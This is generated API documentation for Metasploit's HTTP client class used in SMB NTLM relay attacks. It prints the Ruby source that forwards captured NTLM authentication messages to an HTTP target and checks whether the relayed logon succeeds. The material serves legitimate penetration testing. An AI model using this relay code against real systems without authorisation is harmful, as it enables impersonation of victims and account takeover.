Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Inherits:

Object

Object
Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

show all

Extended by:: Forwardable

Defined in:: lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb

Overview

The HTTP Client for interacting with the relayed_target

Instance Attribute Summary collapse

#logger ⇒ Object readonly protected

Returns the value of attribute logger.
#target ⇒ Object readonly

Returns the value of attribute target.
#timeout ⇒ Object

Returns the value of attribute timeout.

Class Method Summary collapse

.create(provider, target, logger, timeout) ⇒ Object

Instance Method Summary collapse

#disconnect! ⇒ Object
#initialize(provider: nil, target: nil, logger: nil, timeout: -1)) ⇒ Client constructor

A new instance of Client.
#relay_ntlmssp_type1(client_type1_msg) ⇒ Object
#relay_ntlmssp_type3(client_type3_msg) ⇒ Object
#send_recv(req, t = -1,, persist = true) ⇒ Object

Constructor Details

#initialize(provider: nil, target: nil, logger: nil, timeout: -1)) ⇒ `Client`

Returns a new instance of Client.

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 11

def initialize(provider: nil, target: nil, logger: nil, timeout: -1)
  @logger = logger
  @provider = provider
  @target = target
  @timeout = timeout
  http_logger_subscriber = Rex::Proto::Http::HttpLoggerSubscriber.new(logger: logger)

  @client = Rex::Proto::Http::Client.new(
    target.ip,
    target.port,
    provider.dispatcher.tcp_socket.context,
    target.protocol == :https,
    subscriber: http_logger_subscriber
  )
end

Instance Attribute Details

#logger ⇒ `Object` (readonly, protected)

Returns the value of attribute logger.



109
110
111

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 109

def logger
  @logger
end

#target ⇒ `Object` (readonly)

Returns the value of attribute target.



9
10
11

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 9

def target
  @target
end

#timeout ⇒ `Object`

Returns the value of attribute timeout.



8
9
10

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 8

def timeout
  @timeout
end

Class Method Details

.create(provider, target, logger, timeout) ⇒ `Object`

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 27

def self.create(provider, target, logger, timeout)
  new(
    provider: provider,
    target: target,
    logger: logger,
    timeout: timeout
  )
end

Instance Method Details

#disconnect! ⇒ `Object`



36
37
38

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 36

def disconnect!
  @client.close
end

#relay_ntlmssp_type1(client_type1_msg) ⇒ `Object`

Parameters:

client_type1_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 42

def relay_ntlmssp_type1(client_type1_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type1_msg)
    }
  )

  res = @client.send_recv(req, @timeout, true)

  if res.nil?
    msg = "Unable to retrieve server challenge from #{target} (no HTTP response received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  unless res.code == 401
    msg = "Unable to retrieve server challenge from #{target} (HTTP status #{res.code} received)"
    elog(msg)
    logger.print_error msg
    return nil
  end

  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(
    message: Net::NTLM::Message.decode64(res.headers['WWW-Authenticate'].split[1]),
    nt_status: WindowsError::NTStatus::STATUS_MORE_PROCESSING_REQUIRED
  )
end

#relay_ntlmssp_type3(client_type3_msg) ⇒ `Object`

Parameters:

client_type3_msg (String)

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 76

def relay_ntlmssp_type3(client_type3_msg)
  req = @client.request_raw(
    'method'  => 'GET',
    'uri'     => @target.path,
    'headers' => {
      'Accept-Encoding' => 'identity',
      'Authorization' => 'NTLM ' + Base64.strict_encode64(client_type3_msg)
    }
  )
  res = @client.send_recv(req, @timeout, true)

  http_status_code = @target.protocol_options.fetch(:http_status_code, 200..299)
  if http_status_code.is_a?(Range)
    successful_status = http_status_code.include?(res.code)
  else
    successful_status = http_status_code == res.code
  end
  
  if successful_status
    nt_status = WindowsError::NTStatus::STATUS_SUCCESS
  else
    nt_status = WindowsError::NTStatus::STATUS_LOGON_FAILURE
  end
  Msf::Exploit::Remote::SMB::Relay::NTLM::Target::RelayResult.new(nt_status: nt_status)
end

#send_recv(req, t = -1,, persist = true) ⇒ `Object`

# File 'lib/msf/core/exploit/remote/smb/relay/ntlm/target/http/client.rb', line 102

def send_recv(req, t = -1, persist = true)
  # enable persistence by default to keep the connection open
  @client.send_recv(req, t, persist)
end

Class: Msf::Exploit::Remote::SMB::Relay::NTLM::Target::HTTP::Client

Overview

Instance Attribute Summary collapse

Class Method Summary collapse

Instance Method Summary collapse

Constructor Details

#initialize(provider: nil, target: nil, logger: nil, timeout: -1)) ⇒ Client

Instance Attribute Details

#logger ⇒ Object (readonly, protected)

#target ⇒ Object (readonly)

#timeout ⇒ Object

Class Method Details

.create(provider, target, logger, timeout) ⇒ Object